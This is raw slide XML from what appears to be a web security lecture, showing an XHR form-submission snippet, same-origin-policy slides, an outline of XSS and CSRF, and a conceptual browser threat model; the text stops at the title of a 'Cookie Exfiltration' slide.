              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr.setRequestHeader(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘Content-type’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘application/x-www-form-urlencoded’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>);</a:t>
            </a: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en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr.onreadystatechange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>() {</a:t>
            </a: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en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr.readyState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr.status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a: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en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>				$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>).html(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr.responseText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>);</a:t>
            </a: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en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>			}</a:t>
            </a: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en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>		};</a:t>
            </a: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en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>($(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>).serialize());</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRP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en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>});</a:t>
            </a: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sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{587B6C36-3391-4AA3-B311-AD36FEA04EFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="945397" y="2603715"/>
            <a:ext cx="4370522" cy="59668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378BB36-6F2D-49A0-A644-47B05C158A42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250196" y="3054457"/>
            <a:ext cx="8405247" cy="10138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D2EFC88-1B7F-4C7A-82B1-B9EC5FA4E19C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250196" y="5372013"/>
            <a:ext cx="3166822" cy="50692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B54526F-DFF5-4B1A-803C-E00E856F5CA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250196" y="3959773"/>
            <a:ext cx="5220346" cy="153437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21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1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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XHR vs. SOP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1831846"/>
            <a:ext cx="10515600" cy="4811550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Legal: requests for objects from the same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$.get(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server.php?var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>my_val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Illegal: requests for objects from other origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why not?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$.get(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘https://facebook.com/’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Work arounds for cross-domain XHR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JSONP (old-school, horrifically unsafe hack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XDR and CORS (modern techniques)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1156468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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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Web Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828801" y="2743200"/>
            <a:ext cx="9497484" cy="2672522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Same Origin Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1233551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Focus on the Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your browser stores a lot of sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your browsing history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saved usernames and passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saved forms (i.e., credit card numbers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies (especially session cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers try their hardest to secure this information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i.e., prevent an attacker from stealing this information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, nobody is perfect ;)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1873677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4FFFDE9-FF8C-6528-AB36-C2AB1642D2A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05EDFB2D-2706-A9A3-650A-B2D7FE644161}"/>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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Content Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{000E4C11-FB91-4645-73F1-8BE3947EAED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1311372298"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="203200" y="1600200"/>
          <a:ext cx="11785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567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p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>Web Threat </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" dirty="0"/>
              <a:t>Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker’s goal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal information from your browser (i.e., your session cookie for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>bofa.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser’s goal: isolate code from different origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t allow the attacker to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> private information from your browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers' capability: trick you into clicking a link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May direct to a site controlled by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May direct to a legitimate site (but in a nefarious way…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296095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 Model Assumptions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F66915E8-5A92-0F42-605A-D2DE3584DBFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="1616946"/>
          <a:ext cx="10515600" cy="5167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408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416"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>Cookie Exfiltration</a:t>
            </a:r>
            <a:endParaRPr sz="4500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Shape 417"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
